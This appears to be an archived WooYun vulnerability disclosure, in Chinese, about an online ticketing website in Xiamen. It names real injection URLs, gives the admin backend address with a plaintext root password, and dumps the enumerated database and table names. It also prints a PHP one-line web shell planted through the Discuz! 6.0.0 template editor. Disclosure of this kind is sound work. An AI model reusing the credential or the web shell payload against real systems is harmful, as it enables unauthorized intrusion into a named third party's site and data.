乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-05: 细节已通知厂商并且等待厂商处理中 2015-01-09: 厂商已经确认,细节仅向厂商公开 2015-01-19: 细节向核心白帽子及相关领域专家公开 2015-01-29: 细节向普通白帽子公开 2015-02-08: 细节向实习白帽子公开 2015-02-19: 细节向公众公开
厦门某网上售票系统存在sql注入漏洞 可getshell
1 --xss 跨站脚本漏洞http://www.xmqcz.com/getmsgb.php?qno=7556989
2 --sql注入漏洞 注入点在 http://www.xmqcz.com/getmsgb.php?qno=7556989就是我刚才提交留言的地方后台地址http://www.xmqcz.com/bbs/index.php密码root/t8e3y9u8
available databases [3]:[*] information_schema[*] test[*] xmqczDatabase: xmqcz[96 tables]+---------------------------------------+| access_count || bbs_access || bbs_activities || bbs_activityapplies || bbs_adminactions || bbs_admingroups || bbs_adminnotes || bbs_adminsessions || bbs_advertisements || bbs_announcements || bbs_attachments || bbs_attachpaymentlog || bbs_attachtypes || bbs_banned || bbs_bbcodes || bbs_buddys || bbs_caches || bbs_campaigns || bbs_creditslog || bbs_crons || bbs_debateposts || bbs_debates || bbs_failedlogins || bbs_faqs || bbs_favorites || bbs_forumfields || bbs_forumlinks || bbs_forumrecommend || bbs_forums || bbs_imagetypes || bbs_invites || bbs_itempool || bbs_magiclog || bbs_magicmarket || bbs_magics || bbs_medals || bbs_memberfields || bbs_membermagics || bbs_members || bbs_memberspaces || bbs_moderators || bbs_modworks || bbs_myposts || bbs_mythreads || bbs_onlinelist || bbs_onlinetime || bbs_orders || bbs_paymentlog || bbs_pluginhooks || bbs_plugins || bbs_pluginvars || bbs_pms || bbs_pmsearchindex || bbs_polloptions || bbs_polls || bbs_posts || bbs_profilefields || bbs_projects || bbs_promotions || bbs_ranks || bbs_ratelog || bbs_regips || bbs_relatedthreads || bbs_rewardlog || bbs_rsscaches || bbs_searchindex || bbs_sessions || bbs_settings || bbs_smilies || bbs_spacecaches || bbs_stats || bbs_statvars || bbs_styles || bbs_stylevars || bbs_subscriptions || bbs_tags || bbs_templates || bbs_threads || bbs_threadsmod || bbs_threadtags || bbs_threadtypes || bbs_tradecomments || bbs_tradelog || bbs_tradeoptionvars || bbs_trades || bbs_typemodels || bbs_typeoptions || bbs_typeoptionvars || bbs_typevars || bbs_usergroups || bbs_validating || bbs_videos || bbs_videotags || bbs_words || mbuser || msgboard |+---------------------------------------+
3 网站用的Discuz! 6.0.0 没有关闭默认模板编辑功能 致使可getshell在模板中 加入一句话
<!--{eval @eval($_POST['pass']); }-->
过滤 升级dz
危害等级:高
漏洞Rank:12
确认时间:2015-01-09 17:36
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给福建分中心,由福建分中心后续协调网站管理单位处置。
暂无